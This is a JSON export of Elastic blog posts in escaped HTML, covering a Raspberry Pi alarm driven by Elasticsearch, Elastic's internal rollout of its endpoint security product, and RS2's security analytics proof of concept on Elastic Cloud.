second.\u0026nbsp;If it finds that at least one service is down in the most recent 3 seconds, the Watch will trigger a webhook action, and also we set the throttle period to 5 seconds to reduce repeat alerts.\n\u003c/p\u003e\u003cp\u003e\n\tWhen the Watch is created, it will watch your cluster 24x7 without rest, and also you can view the execution history details from Watcher’s UI:\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8a3ad85fa58cb033/5c98d4cd166c55195f6cd4f6/alarm-dashboard.jpg\" data-sys-asset-uid=\"blt8a3ad85fa58cb033\" alt=\"\" \"=\"\"\u003e\n\u003c/p\u003e\u003cp\u003eIf you shutdown some service, you will get an alarm immediately.\n\u003c/p\u003e\u003cp\u003eAlerting with a webhook is really powerful.\u0026nbsp;You may define your own webhook beyond just triggering a warning light, and you can also send the events to your own system, like Jira or GitHub, for further processing.\n\u003c/p\u003e\u003cp\u003eFor more information about how to use Elasticsearch Alerting and how to define a Watch, please refer to this \u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/6.4/watcher-api-put-watch.html\"\u003edoc\u003c/a\u003e.\n\u003c/p\u003e\u003ch2\u003eShow time\u003c/h2\u003e\u003cp\u003eFinally, it’s time to show our work. Check out this video below:\n\u003c/p\u003e\u003cdiv class=\"video embed-container\" style=\"height: 319.725px;\"\u003e\n\t\u003cimg style=\"width: 100%; margin: auto; display: block;\" class=\"vidyard-player-embed\" src=\"https://play.vidyard.com/GNeLehMybxzvYo4gEUc46Y.jpg\" data-uuid=\"GNeLehMybxzvYo4gEUc46Y\" data-v=\"4\" data-type=\"inline\"\u003e\n\u003c/div\u003e\u003ch2\u003eConclusion\u003c/h2\u003e\u003cp\u003eIn this blog post, we used Raspberry Pi to connect the real world, and we also used the power of Elasticsearch to achieve real-time service monitoring. The most important thing is that getting a warning from real lights and a sound buzzer seems very cool. But when you get that kind of warning in your production\u0026nbsp;environment, you should fix the issue right away.\n\u003c/p\u003e\u003cp\u003eAll related scripts can be found in this \u003ca href=\"https://github.com/medcl/pi-warning-light-for-elasticsearch\"\u003erepo\u003c/a\u003e.\u0026nbsp;Have fun!\n\u003c/p\u003e","callout":[{"uid":"blt45b28b3fd05e72ad","_content_type_uid":"callout"}],"category":[{"uid":"blte5cc8450a098ce5e","_version":4,"locale":"en-us","ACL":{},"created_at":"2023-11-02T21:51:15.490Z","created_by":"blt3044324473ef223b70bc674c","key":"how-to","label_l10n":"How to","tags":[],"title":"How to","updated_at":"2024-05-10T13:44:25.495Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.353Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2019-04-01T13:45:41.365Z","created_by":"sys_blt57a423112de8a853","disclaimer":["bltf25c0738ab44ccd2"],"full_bleed_image":{"title":"fire-truck-2000x415.jpg","uid":"blt220c184b4824b93a","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-02-04T06:04:18.275Z","updated_at":"2019-02-04T06:04:18.275Z","content_type":"image/jpeg","file_size":"175190","filename":"fire-truck-2000x415.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-22T18:07:10.016Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt220c184b4824b93a/5c57d5e20da9acd10bcc8e46/fire-truck-2000x415.jpg"},"markdown_l10n":"","publish_date":"2019-02-26T16:00:00.000Z","seo":{"seo_title_l10n":"Building a Real-World Alarm with Elasticsearch and Raspberry Pi","seo_description_l10n":"Learn how to use Raspberry Pi and a relay module to build a real-world alarm notification system for Elasticsearch.","canonical_tag":""},"tags":["raspberrypi","alarm","alerting"],"thumbnail_image":{"title":"fire-truck-720x420.jpg","uid":"blt5d7e04e3f25e4db4","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-02-04T06:04:23.417Z","updated_at":"2019-02-04T06:04:23.417Z","content_type":"image/jpeg","file_size":"82408","filename":"fire-truck-720x420.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-22T18:07:10.016Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5d7e04e3f25e4db4/5c57d5e7a669c2e50b763c3f/fire-truck-720x420.jpg"},"title":"Building a Real-World Alarm with Elasticsearch and Raspberry Pi","title_l10n":"Building a Real-World Alarm with Elasticsearch and Raspberry Pi","updated_at":"2024-10-09T18:02:43.104Z","updated_by":"blt36e890d06c5ec32c","url":"/blog/building-a-real-world-alarm-with-elasticsearch-and-raspberry-pi","publish_details":{"time":"2024-10-09T18:03:04.928Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blta1bb1c3e3c22f84c","_version":17,"locale":"en-us","ACL":{},"abstract_l10n":"The Elastic InfoSec team's internal use of Elastic Security has increased visibility and exponentially expanded its response capabilities to threats.","author":["blt8f7db4157fab33b3","bltaa21b392f1697213","blt8f779296f15e4637"],"body_l10n":"\u003cp\u003e\u003cem\u003eThis blog post is one in an occasional series about how we at Elastic embrace our own technology.\u003c/em\u003e\u003c/p\u003e\u003cp\u003eThe Elastic InfoSec team is responsible for securing Elastic and responding to threats. We use our products everywhere we can\u0026nbsp;— and for more than just logs. By harnessing the power and breadth of capabilities of the Elastic Stack, we are working on tracking risk and performance metrics, threat intelligence, our control framework, and control conformance information within Elastic.\u0026nbsp;\u003c/p\u003e\u003cp\u003eSecurity has been and continues to be a top priority internally as well as in the products we develop and deliver. We’ve doubled down on these efforts when we joined forces with \u003ca href=\"https://www.elastic.co/blog/endgame-joins-forces-with-elastic\"\u003eEndgame\u003c/a\u003e to craft Elastic Endpoint Security, and with \u003ca href=\"https://www.elastic.co/blog/welcome-perched-security-training-for-siem-threat-hunting-and-more\"\u003ePerched\u003c/a\u003e to help create Elastic SIEM. Teaming up with these companies brought a whole new set of security professionals to the Elastic organization. Each professional brings a diverse set of skills and experiences that we can lean on to help protect our organization using our own security products — \u003ca href=\"https://www.elastic.co/endpoint-security\"\u003eElastic Endpoint Security\u003c/a\u003e and \u003ca href=\"https://www.elastic.co/siem\"\u003eElastic SIEM\u003c/a\u003e.\u003c/p\u003e\u003cp\u003eOur internal use of the Elastic Security solution has increased the Elastic InfoSec team’s level of visibility and has exponentially expanded its response capabilities to more fully empower the broader organization to protect the Elastic enterprise from the threats of today and tomorrow. For our Elastic community of users and customers, this also translates to us delivering a better, leading security solution.\u0026nbsp;\u003c/p\u003e\u003cp\u003eWe are excited to share our story….\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003e“Customer Zero”\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eWe have the expressed goal of being Customer Zero for all of our solutions, and this applies especially to Elastic Security. To ensure that what we deploy to our customers has been tested in a real production environment before it gets distributed more broadly, we’re an early adopter of build candidate (pre-release) versions of the Elastic Stack and each of our solution deployments.\u003c/p\u003e\u003cp\u003eWe’re excited about having an industry-leading Endpoint Detection and Response (EDR) tool available to use within our environment. You can read all about the effectiveness of Elastic \u003ca href=\"https://www.elastic.co/security/endpoint-security\" target=\"_self\"\u003eEndpoint Security solution\u003c/a\u003e in third-party reports from NSS Labs, Gartner, and AV Comparatives in \u003ca href=\"https://www.elastic.co/blog/introducing-elastic-endpoint-security\"\u003ethis post\u003c/a\u003e.\u003c/p\u003e\u003cp\u003eHaving leading detection and response capabilities on the endpoint is great on its own, but we’re really thrilled by the possibilities that come with its native integration with the Elastic Stack and Elastic SIEM.\u0026nbsp;\u003c/p\u003e\u003cp\u003eIt’s remarkable to have the ability to create automated responses and advanced analytics in addition to having the data and visuals we as analysts need — all in a single platform.\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003ePiloting Elastic Endpoint Security\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eReplacing an endpoint security agent is not a task that is frequently undertaken, and it often comes with unexpected challenges. So when we announced our intent to bring Endgame into the Elastic fold, we immediately began planning our migration from CrowdStrike to Elastic Endpoint Security (formerly Endgame).\u0026nbsp;\u003c/p\u003e\u003cp\u003eAfter officially joining forces with Endgame, we began to deploy the Sensor Management Platform (SMP) for our end user pilot. We were easily able to import our whitelist and trusted applications that we had previously configured in CrowdStrike. Then, we created a single detection policy within the SMP and enabled all threat and adversary behavior detections. We also enabled all event collection features and set up event streaming to Elasticsearch.\u0026nbsp;\u003c/p\u003e\u003cp\u003eWe ran the pilot on a small percentage of endpoints in a detect-only mode for a little more than a week. With our pilot users streaming endpoint data back to the SMP and to our endpoint monitoring Elasticsearch cluster, we began migrating our existing Auditbeat and Winlogbeat dashboards, queries, and Watcher alerts to use the endpoint index. The data received via the endpoint agent is similar to the data collected by Auditbeat and Winlogbeat without having to manage yaml configurations.\u003c/p\u003e\u003cp\u003e\u003cem\u003e\u003c/em\u003e\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltec0e916e79b25bd3/5e470e8a7c62095ce7b37118/Securingendpoints-blog-canvas-dashboard-overview-Elastic-Endpoint-Alerts-1.jpg\" data-sys-asset-uid=\"bltec0e916e79b25bd3\" alt=\"Securingendpoints-blog-canvas-dashboard-overview-Elastic-Endpoint-Alerts-1.jpg\"/\u003e\u003c/p\u003e\u003cp\u003e\u003cem\u003e\u003c/em\u003e\u003c/p\u003e\u003cfigcaption\u003e\u003cem\u003eA Canvas dashboard giving an overview of Elastic Endpoint Alerts\u003c/em\u003e\u003c/figcaption\u003e\u003ch2\u003e\u003cstrong\u003eInvestigating with Elastic SIEM\u003c/strong\u003e\u003cbr /\u003e\u003c/h2\u003e\u003cp\u003eWe were then ready to perform investigations in the Elastic SIEM app by simply adding the “endgame-*” index pattern to the default index for SIEM in Kibana. Investigating Elastic Endpoint Security alerts or other anomalous behavior in the SIEM app is easy with Timeline. Timeline allows us to stitch together processes by process ancestry similar to the ResolverTM view within the management console. It also allows us to see a population of events and data (process names, process arguments, etc.) across our entire endpoint fleet with the speed of Elasticsearch.\u003c/p\u003e\u003cp\u003e\u003cem\u003e\u003c/em\u003e\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt85eaeb609b10986e/5e470e9894aef92989eeff6a/Securingendpoints-blog-configuring-indices-Elastic-SIEM.png\" data-sys-asset-uid=\"blt85eaeb609b10986e\" alt=\"Securingendpoints-blog-configuring-indices-Elastic-SIEM.png\"/\u003e\u003c/p\u003e\u003cp\u003e\u003cem\u003e\u003c/em\u003e\u003c/p\u003e\u003cfigcaption\u003e\u003cem\u003eConfiguring indices for the Elastic SIEM\u003c/em\u003e\u003c/figcaption\u003e\u003cp\u003eDuring the pilot, we had a single malware detection on one of our Mac workstations that had been present on the system with CrowdStrike installed. We were able to use the response capability in Elastic Endpoint Security to remotely remediate the malware with minimal impact and downtime to the impacted user. The user was actually able to continue working; the only interruption experienced was us telling them we were remotely working on their laptop.\u0026nbsp;\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eWe were very happy with how easy it was to remove a fairly complex piece of malware that had several persistence mechanisms.\u0026nbsp;\u003c/p\u003e\u003cp\u003eWe’re a distributed organization with currently 1,900+ Elasticians located across 40+ countries, and a lot of our employees rarely, if ever, find themselves in an Elastic office. With this in mind, we were impressed with the Elastic Security solution’s ability to enable an Elastic analyst sitting in their house in Germany to successfully remediate malware on the device of a Tennessee-based employee. This was not a capability we had on Macs before installing Elastic Endpoint Security.\u003c/p\u003e\u003ch2\u003e\u003cstrong\u003eDeploying Elastic Endpoint Security\u003c/strong\u003e\u003c/h2\u003e\u003cp\u003eAfter the pilot period, we deployed the Endpoint agent to the remainder of the endpoint fleet in detect mode over a period of five days while removing CrowdStrike at the same time. During this period, we deployed to 1800+ endpoints — our fleet of user devices at that point in time — with no reported issues from any of our fellow Elastician users. If you’ve ever deployed an agent to user endpoints (especially security agents), you know it never goes this smoothly. But for us, it did.\u003c/p\u003e\u003cp\u003eOnce we rolled out to the fleet at large, we had 23 systems report malicious files that needed to be remediated. The surprising part for us was the extremely low false positive rate on threat detections.\u0026nbsp;\u003c/p\u003e\u003cp\u003eThe Adversary Behavior detections, however, were noisier and filled with false positives because of the diverse skill sets, and subsequent behavioral trends, of our Elasticians. We saw things like Elastic security professionals conducting research and exploit proof of concepts, developers creating software, and sales architects running containers and other interesting tools. Our initial pilot users, along with the 23 systems that had true positive threat detections, were moved into prevent mode in less than a month with no reported impact.\u0026nbsp;\u003c/p\u003e\u003cp\u003eShortly after moving the pilot users to prevent mode, we migrated the entire fleet of user devices to prevent mode with \u003cem\u003ezero\u003c/em\u003e reported issues.\u0026nbsp;\u003c/p\u003e\u003cp\u003eThe difference in visibility we now have into our endpoints is amazing. We can be using remote response on an endpoint across the globe and see the signals from the endpoint in both the endpoint console and in Kibana — in close to real time. The level of detail in the signals is better than we have typically seen with other endpoint security tools we’ve used in the past.\u003c/p\u003e\u003cp\u003e\u003cem\u003e\u003c/em\u003e\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc00422b5bf702433/5e470eacca06ad274a65b76f/Securingendpoints-blog-elastic-SIEM-signal-and-resolver-view-console-1.jpg\" data-sys-asset-uid=\"bltc00422b5bf702433\" alt=\"Securingendpoints-blog-elastic-SIEM-signal-and-resolver-view-console-1.jpg\"/\u003e\u003c/p\u003e\u003cp\u003e\u003cem\u003e\u003c/em\u003e\u003c/p\u003e\u003cfigcaption\u003e\u003cem\u003e(Top) A Signal in the Elastic SIEM app for an Elastic Endpoint Alert with logs for the same host inline with the Signal. (Bottom) The Resolver view, in the Elastic Endpoint Security console, showing the process lineage associated with the same alert.\u003c/em\u003e\u003c/figcaption\u003e\u003cem\u003e\u003c/em\u003e\u003ch2\u003e\u003cstrong\u003eFrom Elastic workstation to server fleet protection and beyond\u003c/strong\u003e\u003cbr /\u003e\u003c/h2\u003e\u003cp\u003eNow that our Elastic workstations are fully protected by Elastic Endpoint Security, we have begun our pilot of placing the Elastic Endpoint Security agent on our server fleet. We’ll be targeting all our server resources that bring you Elastic Cloud and enable us to deliver the Elastic Stack.\u0026nbsp;\u003c/p\u003e\u003cp\u003eThis rollout will probably take a bit more time than our endpoint rollout. We have a broader set of operating systems and cloud providers to test on than we did for workstations, but we’ll get there soon enough.\u003c/p\u003e\u003cp\u003eWe’re excited to continue using the Elastic Security solution and all the integrations it has with the Elastic Stack. We’ll keep providing feedback directly to the Elastic teams working on the product, workflows, and integrations. We see this as a really great internal partnership.\u0026nbsp;\u003c/p\u003e\u003cp\u003eBest of all, we’ll continue being Customer Zero so that our customers can benefit from well-tested and thoroughly deployed Elastic solutions and products.\u003c/p\u003e\u003cp\u003e\u003cem\u003eMandy Andress is CISO at Elastic; Darren LaCasse is Principal Analytics and Detection Lead I at Elastic; and Brian Milbier is Principal Security Assurance Analyst I at Elastic.\u003c/em\u003e\u003c/p\u003e","callout":[{"uid":"blt45b28b3fd05e72ad","_content_type_uid":"callout"}],"category":[{"title":"User Stories (not in use)","key":"customers","tags":[],"locale":"en-us","uid":"blt26ff0a1ade01f60d","created_by":"sys_blt57a423112de8a853","updated_by":"blt3044324473ef223b70bc674c","created_at":"2018-08-27T12:42:07.232Z","updated_at":"2024-05-10T13:44:13.133Z","ACL":{},"_version":4,"label_l10n":"Customers","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-15T21:04:11.996Z","user":"blt36e890d06c5ec32c"}}],"created_at":"2020-02-14T21:26:42.405Z","created_by":"bltc87e8bcd2aefc255","disclaimer":["bltf25c0738ab44ccd2"],"full_bleed_image":{"uid":"bltda20de027f0d8dea","created_by":"bltc87e8bcd2aefc255","updated_by":"bltf6ab93733e4e3a73","created_at":"2020-02-14T21:07:07.850Z","updated_at":"2021-01-12T21:06:03.842Z","content_type":"image/png","file_size":"44742","filename":"blog-banner-elastic-on-elastic.png","title":"blog-banner-elastic-on-elastic.png","ACL":{},"_version":2,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-01-12T21:06:06.915Z","user":"bltf6ab93733e4e3a73"},"description":"","parent_uid":null,"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltda20de027f0d8dea/5ffe0f3bc4800352b1e50143/blog-banner-elastic-on-elastic.png"},"markdown_l10n":"","publish_date":"2020-02-19T16:00:00.000Z","seo":{"seo_title_l10n":"Securing our own Elastic endpoints with Elastic Security","seo_description_l10n":"The Elastic InfoSec team's internal use of Elastic Security has increased visibility and exponentially expanded its protection and response capabilities to threats. For Elastic community users and customers, this translates to us delivering a better tested security solution.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"_version":2,"is_dir":false,"uid":"bltd44d2f0e1f4f4b7d","ACL":{},"content_type":"image/png","created_at":"2020-02-14T21:07:01.894Z","created_by":"bltc87e8bcd2aefc255","description":"","file_size":"37777","filename":"blog-thumb-elastic-on-elastic.png","parent_uid":"blta8bbe6455dcfdb35","tags":[],"title":"blog-thumb-elastic-on-elastic.png","updated_at":"2022-02-11T21:03:58.816Z","updated_by":"bltf6ab93733e4e3a73","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-24T17:27:15.343Z","user":"blt36e890d06c5ec32c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltd44d2f0e1f4f4b7d/5ffe0f637c627d662d7fd996/blog-thumb-elastic-on-elastic.png"},"title":"Elastic on Elastic: Securing our endpoints with Elastic Security","title_l10n":"Elastic on Elastic: Securing our endpoints with Elastic Security","updated_at":"2024-10-09T18:02:42.678Z","updated_by":"blt36e890d06c5ec32c","url":"/blog/securing-our-own-endpoints-with-elastic-security","publish_details":{"time":"2024-10-09T18:03:04.941Z","user":"blt36e890d06c5ec32c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt5a3abce568bf369c","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Here's the story of how RS2 quickly got Elastic Cloud from PoC to production by proving it as a security analytics solution.","author":["blt47281ee31f9b7aa9"],"body_l10n":"\u003cp\u003eAt RS2, security is at the core of everything we do. Our main product, BankWORKS, is a fully featured, end-to-end integrated solution for all payment processing needs — from device transaction acquisition through to final settlement and ledger integration. The software is used by Banks, Processors and Payment Service Providers around the world, big and small, simple to complex. We also offer the product as a hosted managed service.\u003cbr\u003e\u003c/p\u003e\u003cp\u003eAs a team, we are responsible for making sure that we minimise the risk of data being compromised or leaked, across all avenues of our business, and at the same time ensure that we meet several compliance requirements, all while avoiding disruption of day-to-day operations.\n\u003c/p\u003e\u003cp\u003eIn November 2017, we were planning to grow our security team. Before getting approval for additional hires, though, we needed to alleviate some of the manual effort involved in dealing with incidents and security events. Here began our journey with the Elastic Stack.\n\u003c/p\u003e\u003ch2\u003eThe Journey from Proposal to Production\u003c/h2\u003e\u003ch3\u003eInitial Stages\u003c/h3\u003e\u003cp\u003eHaving previously used the Elastic Stack in other roles, and for personal projects, I wanted to introduce the product to the team. I felt it would fulfil all our requirements thanks to its extensive featureset and scalability.\n\u003c/p\u003e\u003cp\u003eIn the first few days in my new role at RS2, I spun up Elasticsearch and Kibana instances (version 6 in this case) on a virtual machine on my laptop, installed a couple of Beats on the VM itself (\u003ca href=\"/products/beats/packetbeat\"\u003epacketbeat\u003c/a\u003e, \u003ca href=\"/products/beats/auditbeat\"\u003eauditbeat\u003c/a\u003e, \u003ca href=\"/products/beats/metricbeat\"\u003emetricbeat\u003c/a\u003e and \u003ca href=\"/products/beats/filebeat\"\u003efilebeat\u003c/a\u003e) and sent all the data straight to Elasticsearch. The whole process took about an hour (40 minutes of which included the operating system ISO image download and install) to have meaningful data populated in Kibana.\n\u003c/p\u003e\u003cp\u003eI showed this to my colleague and he almost instantly agreed that this was the way forward, and we that should create a demo for the executive team using real data to emphasize effectiveness. We decided to include a few network devices and existing servers which wouldn't require any changes to our production network (using the different Beats and Logstash), as well as some third party integrations.\n\u003c/p\u003e\u003ch3\u003eCloud Evaluation\u003c/h3\u003e\u003cp\u003eIn previous roles, I hosted large Elastic deployments spanning several servers. However, I had never really looked at the Elastic Cloud offering. RS2 happened to be on an \"infrastructure freeze\" due to their imminent migration to the cloud. This, coupled with tight deadlines and limited resources, led me to explore Elastic Cloud. As a security professional, I was skeptical. I wanted to make sure that the service was designed with a degree of security in mind.\n\u003c/p\u003e\u003cp\u003eOnce I had my cluster, I carried out a few quick security tests to see if I can spot any blatant vulnerabilities or weaknesses. Here's what I discovered:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003eElastic lets you choose between AWS and GCP as a backend cloud provider, so all their security features are inherited, along with their compliance certifications.\u003c/li\u003e\n\t\u003cli\u003eSegregated networks are used for each cluster, not the default subnets for each provider.\u003c/li\u003e\n\t\u003cli\u003eModern TLS settings and ciphers are used for both the Elasticsearch and Kibana URL's\u003c/li\u003e\n\t\u003cli\u003eElasticsearch transport ports are randomised\u003c/li\u003e\n\t\u003cli\u003eThe URLs for each instance are also completely randomised, so it isn't possible to enumerate customer names\u003c/li\u003e\n\t\u003cli\u003eDirect IP access is not possible without the cluster ID\u003c/li\u003e\n\t\u003cli\u003eThe latest versions of the Elastic Stack is used, along with a recent version of Java 8.\u003c/li\u003e\n\u003c/ul\u003e\u003ch3\u003ePutting it all Together\u003c/h3\u003e\u003cp\u003eNow that I had my cloud cluster, I had to design the data flows. The diagram below outlines the architecture for the POC.\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt61fc66e37e3d1139/5c58424822d96be10bcca5fa/diagram-architecture-for-the-poc.jpg\" data-sys-asset-uid=\"blt61fc66e37e3d1139\" alt=\"Diagram - Architecture for the POC\"\u003e\n\u003c/p\u003e\u003cp\u003eSince we had X-Pack available to us, Watcher was utilised heavily as part of the alerting framework. This was integrated with a custom Slackbot by using the \u003ca href=\"https://www.elastic.co/guide/en/x-pack/6.x/actions-webhook.html\"\u003eWatcher webhook actions\u003c/a\u003e.\n\u003c/p\u003e\u003ch3\u003eDemo Preparation – Working with the Data\u003c/h3\u003e\u003cp\u003eThe first step was to parse and enrich our logs as much as possible. In a security context, enrichment is key for solving incidents quickly, as it greatly reduces the investigation time for analysts. It also helps to filter out false positives. Using several Logstash filter plugins, I was able to do this with ease. Additionally, to cater for our existing log archiving tool, I was able to set up multiple Logstash outputs to simultaneously send data to our Elastic cluster and the existing archiving tool.\n\u003c/p\u003e\u003cp\u003eBelow is a list of some of the enrichment operations added to our parsed logs:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003e\u003cstrong\u003eGeoIP data (Location and ASN)\u003c/strong\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003cstrong\u003eMalware IP lookups\u003c/strong\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003cstrong\u003eAllowed logins user lookups\u003c/strong\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003cstrong\u003eUser agent parsing\u003c/strong\u003e\u003c/li\u003e\n\t\u003cli\u003e\u003cstrong\u003eURL decoding\u003c/strong\u003e\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eThis is a partial list of enrichments set up for the POC. Many more were added once we made the move to production.\n\u003c/p\u003e\u003cp\u003eNow that I had all this data nicely parsed, I created custom dashboards to work alongside the inbuilt ones to highlight some of the enrichment features previously mentioned. Here are just a few examples of some of the custom Kibana dashboards we developed for the POC (all sensitive data has been removed):\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltb7ab98a707dca0f9/5c306721597189c90b02429a/kibana-dashboard-1.jpg\" data-sys-asset-uid=\"bltb7ab98a707dca0f9\" alt=\"Kibana Dashboard 1.jpg\"\u003e\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6595ac48c4bae518/5c30671ead674d236e764932/kibana-dashboard-2.jpg\" data-sys-asset-uid=\"blt6595ac48c4bae518\" alt=\"Kibana Dashboard 2.jpg\"\u003e\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5bc9e9bfb38a6dba/5c306719682c4c4866a798ec/kibana-dashboard-3.jpg\" data-sys-asset-uid=\"blt5bc9e9bfb38a6dba\" alt=\"Kibana Dashboard 3.jpg\"\u003e\n\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5c6faa73be35d3ce/5c306715e71ce40c6e4ada09/kibana-dashboard-4.jpg\" data-sys-asset-uid=\"blt5c6faa73be35d3ce\" alt=\"Kibana Dashboard 4\"\u003e\n\u003c/p\u003e\u003cp\u003eAdditionally, I added some other nifty integrations for the demo to show how simple it is to add data into Elastic. At the end of the day, it's just another index. One example of this was an integration with the popular service \"Have I been Pwned\" by Troy Hunt. The service provides a very handy REST API, which allows you to query if an email address is detected in publicised data breaches. A watch was created to alert us to any new entries for our domain.\n\u003c/p\u003e\u003ch3\u003eAlerting\u003c/h3\u003e\u003cp\u003eThe idea behind the alerting framework in the POC (to later be used in production) was to have everything actionable through Slack. Below are some examples of the manipulated data within the Slackbot. Everything an analyst needs to kick off an investigation is included. The data used was gathered by different Beats and the parsed network device logs via Logstash.\n\u003c/p\u003e\u003cp\u003eSome of the datasets included:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003eSMTP relay logs, authentication logs and packetfilter logs from our Firewalls\u003c/li\u003e\n\t\u003cli\u003eDNS requests at a packet level, using Packetbeat\u003c/li\u003e\n\t\u003cli\u003eSSH/SFTP logs, using a combination of Wazuh and Filebeat\u003c/li\u003e\n\t\u003cli\u003eA list of processes and their states, using Metricbeat\u003c/li\u003e\n\t\u003cli\u003eOutbound network socket monitoring, using Auditbeat on *nix systems\u003c/li\u003e\n\u003c/ul\u003e\u003cp\u003eHere are just a few examples of some of the Slackbot alerts we developed for the POC (all sensitive data has been removed):\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003eTeamViewer Connection Alert\u003cbr\u003e\u003cbr\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltf644ac1b53085987/5c306711b2b2be79676e8480/teamview-connection-detected.jpg\" data-sys-asset-uid=\"bltf644ac1b53085987\" alt=\"Teamview Connection Detected\" width=\"400\"\u003e\u003c/li\u003e\n\t\u003cli\u003eFirewall Login Alert\u003cbr\u003e\u003cbr\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltad0c8a7c731c55e7/5c30670d61a626fb0b630156/rs2-security-bot.jpg\" data-sys-asset-uid=\"bltad0c8a7c731c55e7\" alt=\"RS2 - Security Bot - Firewall Login Detected\" width=\"400\"\u003e\u003c/li\u003e\n\t\u003cli\u003eMalware Alert\u003cbr\u003e\u003cbr\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta3312d2dcbfd2837/5c30670929d13af10bc2aba0/rs2-security-bot2.jpg\" data-sys-asset-uid=\"blta3312d2dcbfd2837\" alt=\"RS2 - Security Bot - Communication with Malware IP Detected\" width=\"400\"\u003e\u003c/li\u003e\n\u003c/ul\u003e\u003ch3\u003eThe Results\u003c/h3\u003e\u003cp\u003eNeedless to say, the POC was extremely successful and we got approval to move to production. To reiterate, the main points that got us through this POC so smoothly:\n\u003c/p\u003e\u003cul\u003e\n\t\u003cli\u003eThe exceptional ease and speed of using Elastic Cloud and everything it encompasses (integrated backups out of the box, resiliency and high availability, bundled X-Pack for our size of deployment)\u003c/li\u003e\n\t\u003cli\u003eThe ability to take in any data and turn it into something useful and actionable very quickly (the POC, from start to finish, took about 3 full days to implement, including all the tasks mentioned in this post – parsing, dashboards, enrichment, the alerting framework, so on and so forth)\u003c/li\u003e\n\t\u003cli\u003eThe fact that this could be done in parallel to all existing processes, without interruption\u003c/li\u003e\n\u003c/ul\u003e\u003ch2\u003eDealing with Upgrades\u003c/h2\u003e\u003cp\u003eAfter a few weeks in production, there was an update released by Elastic. Having previously upgraded large Elastic deployments with X-Pack, I was very curious to see how this was carried out by their cloud platform. It turned out to be as simple as selecting the new version in a dropdown menu. Everything else was done automatically, without any interruptions.\n\u003c/p\u003e\u003ch2\u003eConclusion\u003c/h2\u003e\u003cp\u003eOur journey with Elastic obviously did not end here. We are constantly adding more data sources, more enrichment (like correlation with our HR systems to get user vacation data, and physical access systems to know if someone is and should be in the building or not) and adding alerts on the fly based on newly discovered threats and malicious activity. We are also working on integrating with additional internal tools that we use.\n\u003c/p\u003e\u003cp\u003eWe are excited about the future of \u003ca href=\"/solutions/security-analytics\"\u003esecurity analytics\u003c/a\u003e with Elastic. With every update, Elastic releases additional components that make the lives of analysts easier, and their jobs more satisfactory. Additionally, we are equally as excited for the upcoming upgrades to Elastic Cloud. Without a doubt, RS2 will continue to benefit from the extensive feature sets, not just for security analytics, but throughout the entire 